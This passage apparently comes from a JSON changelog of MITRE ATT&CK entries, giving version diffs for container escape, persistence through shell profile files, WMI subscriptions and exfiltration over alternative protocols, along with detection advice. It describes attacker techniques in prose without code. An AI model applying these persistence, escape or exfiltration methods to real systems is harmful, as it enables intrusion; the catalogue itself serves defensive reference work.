run commands on the underlying host.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)\\n+\\n+Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][5]\": {\"source_name\": \"Windows Server Containers Are Open\", \"description\": \"Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021.\", \"url\": \"https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/\"}, \"root['x_mitre_contributors'][0]\": \"Yuval Avrahami, Palo Alto Networks\", \"root['x_mitre_contributors'][1]\": \"Daniel Prizmant, Palo Alto Networks\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may break out of a container to gain access to t | t | 1 | Adversaries may break out of a container to gain access to t |
| > | he underlying host. This can allow an adversary access to ot | > | he underlying host. This can allow an adversary access to ot | ||
| > | her containerized resources from the host level or to the ho | > | her containerized resources from the host level or to the ho | ||
| > | st itself. In principle, containerized resources should prov | > | st itself. In principle, containerized resources should prov | ||
| > | ide a clear separation of application functionality and be i | > | ide a clear separation of application functionality and be i | ||
| > | solated from the host environment.(Citation: Docker Overview | > | solated from the host environment.(Citation: Docker Overview | ||
| > | ) There are multiple ways an adversary may escape to a host | > | ) There are multiple ways an adversary may escape to a host | ||
| > | environment. Examples include creating a container configur | > | environment. Examples include creating a container configur | ||
| > | ed to mount the host\u2019s filesystem using the bind parameter, | > | ed to mount the host\u2019s filesystem using the bind parameter, | ||
| > | which allows the adversary to drop payloads and execute cont | > | which allows the adversary to drop payloads and execute cont | ||
| > | rol utilities such as cron on the host, and utilizing a priv | > | rol utilities such as cron on the host, or utilizing a privi | ||
| > | ileged container to run commands on the underlying host.(Cit | > | leged container to run commands on the underlying host.(Cita | ||
| > | ation: Docker Bind Mounts)(Citation: Trend Micro Privileged | > | tion: Docker Bind Mounts)(Citation: Trend Micro Privileged C | ||
| > | Container)(Citation: Intezer Doki July 20) Gaining access to | > | ontainer)(Citation: Intezer Doki July 20) Adversaries may al | ||
| > | the host may provide the adversary with the opportunity to | > | so escape via [Exploitation for Privilege Escalation](https: | ||
| > | achieve follow-on objectives, such as establishing persisten | > | //attack.mitre.org/techniques/T1068), such as exploiting vul | ||
| > | ce, moving laterally within the environment, or setting up a | > | nerabilities in global symbolic links in order to access the | ||
| > | command and control channel on the host. | > | root directory of a host machine.(Citation: Windows Server | ||
| > | Containers Are Open) Gaining access to the host may provide | ||||
| > | the adversary with the opportunity to achieve follow-on obj | ||||
| > | ectives, such as establishing persistence, moving laterally | ||||
| > | within the environment, or setting up a command and control | ||||
| > | channel on the host. |
/etc) and the user\u2019s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user\u2019s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "privilege-escalation"
},
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1546/004",
"external_id": "T1546.004"
},
{
"source_name": "intezer-kaiji-malware",
"description": "Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware turning to Golang. Retrieved December 17, 2020.",
"url": "https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/"
},
{
"source_name": "bencane blog bashrc",
"description": "Benjamin Cane. (2013, September 16). Understanding a little more about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.",
"url": "https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/"
},
{
"source_name": "anomali-rocke-tactics",
"description": "Anomali Threat Research. (2019, October 15). Illicit Cryptomining Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved December 17, 2020.",
"url": "https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect"
},
{
"source_name": "Linux manual bash invocation",
"description": "ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.",
"url": "https://wiki.archlinux.org/index.php/Bash#Invocation"
},
{
"source_name": "Tsunami",
"description": "Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware Targets DVRs, Forms Botnet. Retrieved December 17, 2020.",
"url": "https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/"
},
{
"source_name": "anomali-linux-rabbit",
"description": "Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved December 17, 2020.",
"url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat"
},
{
"source_name": "Magento",
"description": "Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection Vector. Retrieved December 17, 2020.",
"url": "https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html"
},
{
"source_name": "ScriptingOSX zsh",
"description": "Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration Files. Retrieved February 25, 2021.",
"url": "https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/"
},
{
"source_name": "PersistentJXA_leopitt",
"description": "Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell for macOS. Retrieved January 11, 2021.",
"url": "https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5"
},
{
"source_name": "code_persistence_zsh",
"description": "Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. Retrieved January 11, 2021.",
"url": "https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js"
},
{
"source_name": "macOS MS office sandbox escape",
"description": "Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.",
"url": "https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a"
},
{
"source_name": "ESF_filemonitor",
"description": "Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.",
"url": "https://objective-see.com/blog/blog_0x48.html"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Robert Wilson",
"Tony Lambert, Red Canary"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution",
"File: File Creation",
"File: File Modification"
],
"x_mitre_detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /etc/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.\n",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator"
],
"x_mitre_platforms": [
"Linux",
"macOS"
],
"x_mitre_version": "2.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-20 18:01:52.120000+00:00\", \"old_value\": \"2021-03-08 15:22:54.089000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may establish persistence through executing malicious commands triggered by a user\\u2019s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user\\u2019s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user\\u2019s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \\n\\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \\n\\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.\", \"old_value\": \"Adversaries may establish persistence through executing malicious commands triggered by a user\\u2019s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user\\u2019s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user\\u2019s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \\n\\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \\n\\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.\", \"diff\": \"--- \\n+++ \\n@@ -2,4 +2,4 @@\\n \\n Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \\n \\n-For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.\\n+For macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.\"}, \"root['external_references'][11]['source_name']\": {\"new_value\": \"macOS MS office sandbox escape\", \"old_value\": \"ESF_filemonitor\"}, \"root['external_references'][11]['description']\": {\"new_value\": \"Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump. Retrieved August 20, 2021.\", \"old_value\": \"Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.\"}, \"root['external_references'][11]['url']\": {\"new_value\": \"https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a\", \"old_value\": \"https://objective-see.com/blog/blog_0x48.html\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['external_references'][12]\": {\"source_name\": \"ESF_filemonitor\", \"description\": \"Patrick Wardle. (2019, September 17). Writing a File Monitor with Apple's Endpoint Security Framework. Retrieved December 17, 2020.\", \"url\": \"https://objective-see.com/blog/blog_0x48.html\"}}}",
"previous_version": "2.0",
"version_change": "2.0 \u2192 2.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may establish persistence through executing mali | t | 1 | Adversaries may establish persistence through executing mali |
| > | cious commands triggered by a user\u2019s shell. User [Unix Shell | > | cious commands triggered by a user\u2019s shell. User [Unix Shell | ||
| > | ](https://attack.mitre.org/techniques/T1059/004)s execute se | > | ](https://attack.mitre.org/techniques/T1059/004)s execute se | ||
| > | veral configuration scripts at different points throughout t | > | veral configuration scripts at different points throughout t | ||
| > | he session based on events. For example, when a user opens a | > | he session based on events. For example, when a user opens a | ||
| > | command-line interface or remotely logs in (such as via SSH | > | command-line interface or remotely logs in (such as via SSH | ||
| > | ) a login shell is initiated. The login shell executes scrip | > | ) a login shell is initiated. The login shell executes scrip | ||
| > | ts from the system (<code>/etc</code>) and the user\u2019s home d | > | ts from the system (<code>/etc</code>) and the user\u2019s home d | ||
| > | irectory (<code>~/</code>) to configure the environment. All | > | irectory (<code>~/</code>) to configure the environment. All | ||
| > | login shells on a system use /etc/profile when initiated. T | > | login shells on a system use /etc/profile when initiated. T | ||
| > | hese configuration scripts run at the permission level of th | > | hese configuration scripts run at the permission level of th | ||
| > | eir directory and are often used to set environment variable | > | eir directory and are often used to set environment variable | ||
| > | s, create aliases, and customize the user\u2019s environment. Whe | > | s, create aliases, and customize the user\u2019s environment. Whe | ||
| > | n the shell exits or terminates, additional shell scripts ar | > | n the shell exits or terminates, additional shell scripts ar | ||
| > | e executed to ensure the shell exits appropriately. Advers | > | e executed to ensure the shell exits appropriately. Advers | ||
| > | aries may attempt to establish persistence by inserting comm | > | aries may attempt to establish persistence by inserting comm | ||
| > | ands into scripts automatically executed by shells. Using ba | > | ands into scripts automatically executed by shells. Using ba | ||
| > | sh as an example, the default shell for most GNU/Linux syste | > | sh as an example, the default shell for most GNU/Linux syste | ||
| > | ms, adversaries may add commands that launch malicious binar | > | ms, adversaries may add commands that launch malicious binar | ||
| > | ies into the <code>/etc/profile</code> and <code>/etc/profil | > | ies into the <code>/etc/profile</code> and <code>/etc/profil | ||
| > | e.d</code> files.(Citation: intezer-kaiji-malware)(Citation: | > | e.d</code> files.(Citation: intezer-kaiji-malware)(Citation: | ||
| > | bencane blog bashrc) These files typically require root per | > | bencane blog bashrc) These files typically require root per | ||
| > | missions to modify and are executed each time any shell on a | > | missions to modify and are executed each time any shell on a | ||
| > | system launches. For user level permissions, adversaries ca | > | system launches. For user level permissions, adversaries ca | ||
| > | n insert malicious commands into <code>~/.bash_profile</code | > | n insert malicious commands into <code>~/.bash_profile</code | ||
| > | >, <code>~/.bash_login</code>, or <code>~/.profile</code> wh | > | >, <code>~/.bash_login</code>, or <code>~/.profile</code> wh | ||
| > | ich are sourced when a user opens a command-line interface o | > | ich are sourced when a user opens a command-line interface o | ||
| > | r connects remotely.(Citation: anomali-rocke-tactics)(Citati | > | r connects remotely.(Citation: anomali-rocke-tactics)(Citati | ||
| > | on: Linux manual bash invocation) Since the system only exec | > | on: Linux manual bash invocation) Since the system only exec | ||
| > | utes the first existing file in the listed order, adversarie | > | utes the first existing file in the listed order, adversarie | ||
| > | s have used <code>~/.bash_profile</code> to ensure execution | > | s have used <code>~/.bash_profile</code> to ensure execution | ||
| > | . Adversaries have also leveraged the <code>~/.bashrc</code> | > | . Adversaries have also leveraged the <code>~/.bashrc</code> | ||
| > | file which is additionally executed if the connection is es | > | file which is additionally executed if the connection is es | ||
| > | tablished remotely or an additional interactive shell is ope | > | tablished remotely or an additional interactive shell is ope | ||
| > | ned, such as a new tab in the command-line interface.(Citati | > | ned, such as a new tab in the command-line interface.(Citati | ||
| > | on: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anom | > | on: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anom | ||
| > | ali-linux-rabbit)(Citation: Magento) Some malware targets th | > | ali-linux-rabbit)(Citation: Magento) Some malware targets th | ||
| > | e termination of a program to trigger execution, adversaries | > | e termination of a program to trigger execution, adversaries | ||
| > | can use the <code>~/.bash_logout</code> file to execute mal | > | can use the <code>~/.bash_logout</code> file to execute mal | ||
| > | icious commands at the end of a session. For macOS, the fu | > | icious commands at the end of a session. For macOS, the fu | ||
| > | nctionality of this technique is similar but may leverage zs | > | nctionality of this technique is similar but may leverage zs | ||
| > | h, the default shell for macOS 10.15+. When the Terminal.app | > | h, the default shell for macOS 10.15+. When the Terminal.app | ||
| > | is opened, the application launches a zsh login shell and a | > | is opened, the application launches a zsh login shell and a | ||
| > | zsh interactive shell. The login shell configures the syste | > | zsh interactive shell. The login shell configures the syste | ||
| > | m environment using <code>/etc/profile</code>, <code>/etc/zs | > | m environment using <code>/etc/profile</code>, <code>/etc/zs | ||
| > | henv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlog | > | henv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlog | ||
| > | in</code>.(Citation: ScriptingOSX zsh)(Citation: PersistentJ | > | in</code>.(Citation: ScriptingOSX zsh)(Citation: PersistentJ | ||
| > | XA_leopitt)(Citation: code_persistence_zsh) The login shell | > | XA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS | ||
| > | then configures the user environment with <code>~/.zprofile< | > | MS office sandbox escape) The login shell then configures th | ||
| > | /code> and <code>~/.zlogin</code>. The interactive shell use | > | e user environment with <code>~/.zprofile</code> and <code>~ | ||
| > | s the <code>~/.zshrc</code> to configure the user environmen | > | /.zlogin</code>. The interactive shell uses the <code>~/.zsh | ||
| > | t. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlog | > | rc</code> to configure the user environment. Upon exiting, < | ||
| > | out</code> are executed. For legacy programs, macOS executes | > | code>/etc/zlogout</code> and <code>~/.zlogout</code> are exe | ||
| > | <code>/etc/bashrc</code> on startup. | > | cuted. For legacy programs, macOS executes <code>/etc/bashrc | ||
| > | </code> on startup. |
EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-16 20:11:13.719000+00:00\", \"old_value\": \"2021-04-13 21:32:54.094000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"changelog_mitigations": {
"shared": [
"M1018: User Account Management",
"M1026: Privileged Account Management"
],
"new": [
"M1040: Behavior Prevention on Endpoint"
],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0005: WMI (WMI Creation)",
"DS0009: Process (Process Creation)",
"DS0017: Command (Command Execution)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2017-05-31 21:30:44.720000+00:00",
"modified": "2021-10-15 22:49:28.766000+00:00",
"name": "Exfiltration Over Alternative Protocol",
"description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1048",
"external_id": "T1048"
},
{
"source_name": "Palo Alto OilRig Oct 2016",
"description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.",
"url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/"
},
{
"source_name": "20 macOS Common Tools and Techniques",
"description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
"url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
},
{
"source_name": "University of Birmingham C2",
"description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
"url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"William Cain",
"Alfredo Abarca"
],
"x_mitre_data_sources": [
"Network Traffic: Network Connection Creation",
"Network Traffic: Network Traffic Flow",
"Network Traffic: Network Traffic Content",
"File: File Access",
"Command: Command Execution"
],
"x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
"x_mitre_is_subtechnique": false,
"x_mitre_network_requirements": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.3",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 22:49:28.766000+00:00\", \"old_value\": \"2020-03-28 00:50:31.548000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \\n\\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \\n\\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) \", \"old_value\": \"Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \\n\\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \\n\\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) \", \"diff\": \"--- \\n+++ \\n@@ -2,4 +2,4 @@\\n \\n Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \\n \\n-[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) \\n+[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) \"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"20 macOS Common Tools and Techniques\", \"old_value\": \"University of Birmingham C2\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.\", \"old_value\": \"Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\", \"old_value\": \"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.3\", \"old_value\": \"1.2\"}}, \"iterable_item_added\": 